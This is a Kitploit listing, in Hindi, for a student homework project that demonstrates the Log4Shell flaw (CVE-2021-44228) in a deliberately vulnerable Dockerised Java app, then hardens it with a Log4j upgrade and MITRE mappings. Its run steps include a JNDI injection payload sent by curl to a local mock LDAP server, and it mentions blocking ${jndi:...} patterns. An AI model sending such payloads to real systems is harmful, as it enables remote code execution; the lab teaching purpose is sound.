Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4shell-homework9 — SEAS 8405 के लिए Log4Shell (CVE-2021-44228) शोषण डेमो। इसमें एक कमजोर Spring Boot ऐप, नकली LDAP सर्वर, Docker सेटअप, MITRE मैपिंग, घटना प्रतिक्रिया, और एक पूर्ण स्क्रीन रिकॉर्डिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/serpilrivas/log4shell-homework9
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षाघटना प्रतिक्रियालैब और अभ्यास
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

SEAS 8405 के लिए Log4Shell (CVE-2021-44228) शोषण डेमो। इसमें एक कमजोर Spring Boot ऐप, नकली LDAP सर्वर, Docker सेटअप, MITRE मैपिंग, घटना प्रतिक्रिया, और एक पूर्ण स्क्रीन रिकॉर्डिंग शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

होमवर्क 9 – Log4Shell शोषण के विरुद्ध सिस्टम को सुरक्षित करना

अवलोकन

यह परियोजना Dockerized Java वेब एप्लिकेशन का उपयोग करके Log4Shell भेद्यता (CVE-2021-44228) के शोषण और शमन को प्रदर्शित करती है, जिसमें कमजोर Log4j 2.14.1 शामिल है। सेटअप में JNDI इंजेक्शन हमले के पथ को प्रदर्शित करने के लिए एक अनुकरणीय दुर्भावनापूर्ण LDAP सर्वर भी शामिल है।

शोषण के बाद, Log4j को अपग्रेड करके, इनपुट को मान्य करके, और MITRE D3FEND तथा ATT&CK अनुशंसाओं को लागू करके सिस्टम को कठोर किया जाता है।


फ़ोल्डर संरचना

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

कैसे चलाएँ

1. Java ऐप बनाएँ (कमजोर Log4j के साथ)

root@kitploit:~
docker build -t vulnerable-app .

2. Docker Compose के साथ ऐप चलाएँ

root@kitploit:~
docker-compose up

ऐप इस पते पर चलेगा:
http://localhost:8080

3. नकली LDAP सर्वर शुरू करें (नए टर्मिनल में)

root@kitploit:~
python3 ldap_server.py

4. एक शोषण का अनुकरण करें

ऐप को इस तरह का अनुरोध भेजें:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

LDAP सर्वर को अनुरोध प्राप्त होना चाहिए (यह JNDI शोषण का अनुकरण करता है)।


इसे कैसे कठोर किया गया

हमले का प्रदर्शन करने के बाद, सिस्टम को निम्नलिखित द्वारा सुरक्षित किया गया:

  • Log4j को संस्करण 2.17.0 में अपग्रेड करना
  • इनपुट सत्यापन (${jndi:....} पैटर्न को अवरुद्ध करना)
  • कॉन्फ़िगरेशन में मैसेज लुकअप को अक्षम करना
  • दायरा सीमित करने के लिए Docker पृथक्करण
  • MITRE D3FEND और ATT&CK तकनीकें लागू की गईं

MITRE मैपिंग

MITRE ATT&CK:

  • T1190: सार्वजनिक-मुखी एप्लिकेशन का शोषण
  • T1210: दूरस्थ सेवाओं का शोषण

MITRE D3FEND:

  • D3-IA: इनपुट सत्यापन
  • D3-HI: होस्ट-आधारित घुसपैठ का पता लगाना
  • D3-DA: असुरक्षित सुविधाओं को अक्षम करना

रिपोर्ट

mitigation_report.pdf देखें:

  • पहले/बाद में सिस्टम आर्किटेक्चर
  • Log4Shell की व्याख्या
  • शमन रणनीति
  • घटना प्रतिक्रिया योजना

स्क्रीन रिकॉर्डिंग

यदि वीडियो सीधे अपलोड नहीं किया गया है, तो यह रिपोर्ट के लिंक पर उपलब्ध है।


लेखक

Serpil Rivas
SEAS 8405 – Cybersecurity Architectures
मई 2025

टूल डाउनलोड करें